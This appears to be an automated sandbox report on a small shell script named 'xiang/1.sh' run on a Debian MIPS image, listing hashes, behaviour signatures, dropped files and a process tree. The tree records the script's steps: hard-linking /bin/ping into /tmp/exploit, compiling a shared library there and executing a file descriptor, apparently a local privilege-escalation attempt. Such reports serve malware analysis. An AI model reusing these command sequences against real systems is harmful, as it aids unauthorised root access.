Analysis

  • max time kernel
    18s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20231215-en
  • resource tags

    arch:mips, image:debian9-mipsbe-20231215-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    21-12-2023 20:40

General

  • Target

    xiang/1.sh

  • Size

    404B

  • MD5

    fa4f1798d03844cc950c5c0ff1ed71a7

  • SHA1

    7b7bb83c614603989d91a77ac0405d4000a0fa75

  • SHA256

    a5b0146024e8974f15f29c835f5d2d272a199846fa04963bb05d7e0bd14620ff

  • SHA512

    e94e75ade995e3ed08e1fcff6a830dbb28e512091d72af14bbf19ae6b6a33381130bda2c9b38050e61fc9dcf82e25ba06fb8d8f15edd4edeb1a7c1a675a8139e

Score
3/10

Malware Config

Signatures

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/xiang/1.sh
    /tmp/xiang/1.sh
    1⤵
    • Writes file to tmp directory
    PID:731
    • /bin/rm
      rm -r -f /tmp/exploit
      2⤵
        PID:739
      • /bin/mkdir
        mkdir /tmp/exploit
        2⤵
        • Reads runtime system information
        PID:740
      • /bin/ln
        ln /bin/ping /tmp/exploit/target
        2⤵
          PID:741
        • /bin/ls
          ls -l /proc/731/fd/3
          2⤵
          • Reads runtime system information
          PID:742
        • /bin/rm
          rm -rf /tmp/exploit
          2⤵
            PID:744
          • /bin/ls
            ls -l /proc/731/fd/3
            2⤵
            • Reads runtime system information
            PID:745
          • /bin/cat
            cat
            2⤵
              PID:746
            • /usr/bin/gcc
              gcc -w -fPIC -shared -o /tmp/exploit program.c
              2⤵
              • Writes file to tmp directory
              PID:747
              • /usr/lib/gcc/mips-linux-gnu/6/cc1
                /usr/lib/gcc/mips-linux-gnu/6/cc1 -quiet -imultiarch mips-linux-gnu program.c -meb -quiet -dumpbase program.c "-march=mips32r2" -mfpxx -mllsc -mno-lxc1-sxc1 -mips32r2 "-mabi=32" -auxbase program -w -fPIC -o /tmp/ccahe6Vs.s
                3⤵
                • Writes file to tmp directory
                PID:748
              • /usr/local/sbin/as
                as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                3⤵
                  PID:750
                • /usr/local/bin/as
                  as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                  3⤵
                    PID:750
                  • /usr/sbin/as
                    as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                    3⤵
                      PID:750
                    • /usr/bin/as
                      as -W -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc8n0s6G.o /tmp/ccahe6Vs.s
                      3⤵
                      • Writes file to tmp directory
                      PID:750
                    • /usr/lib/gcc/mips-linux-gnu/6/collect2
                      /usr/lib/gcc/mips-linux-gnu/6/collect2 -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccKTsKrn.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -shared -melf32btsmip -o /tmp/exploit /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/cc8n0s6G.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o
                      3⤵
                      • Writes file to tmp directory
                      PID:751
                      • /usr/bin/ld
                        /usr/bin/ld -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccKTsKrn.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -shared -melf32btsmip -o /tmp/exploit /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/cc8n0s6G.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o
                        4⤵
                        • Writes file to tmp directory
                        PID:752
                • /proc/self/fd/3
                  /proc/self/fd/3
                  1⤵
                    PID:731

                  Network

                  MITRE ATT&CK Matrix


                  Downloads

                  • /tmp/cc8n0s6G.o

                    Filesize

                    1KB

                    MD5

                    7f8ef4de0413dff95c590418f04883bb

                    SHA1

                    14bbc5abee67cbe68a8ed55fc4de6d22a254df7f

                    SHA256

                    c3bb1c7872a52bbeef03792aec5c1da996526f3d15b551fd43264b9d854dc95b

                    SHA512

                    8bf13fd1c3a71646018b1579dc25f2f8b47b9e8fa1ff503d31fb294e71081cf7ca46bcf7cd75487d1be355598cfbdc9fa6f815aee6966ee2ba199cc40f9d722a

                  • /tmp/ccahe6Vs.s

                    Filesize

                    1001B

                    MD5

                    59ba0606674e2404032fb5acbd9db79d

                    SHA1

                    909015a42f352e1f6707cb602a12fc175ff7692c

                    SHA256

                    ad06422ec376e599ccec9fb01ea611b71fdc9beb51a6af9b9ae71a6c6f499be1

                    SHA512

                    a273124dfd5ff551837200998b7c6d57f11409f8503eea651523b81daf72565f033127f6298b8a58c3d06e9813449293ee064a78eb569dd0fb6de0fc1e2726e8

                  • /tmp/exploit

                    Filesize

                    5KB

                    MD5

                    71b9ec6fd892da627f7c0c18793f12c8

                    SHA1

                    2be30d2c1f8a28d8c106d12e5061643748b1d407

                    SHA256

                    6d7dfe250efc110cbbbdd43a2ad65a53ed0a6d7532d82a9fdd54ab0422090efc

                    SHA512

                    72357351dc95618d8d2fc1a1ba0085aba04c5e2f871c11a4ae71350e65235d1eaf436d42b791e86fe547cc7b6ab02b4a8cb5f78894d39ea751b9e3bf83aa051c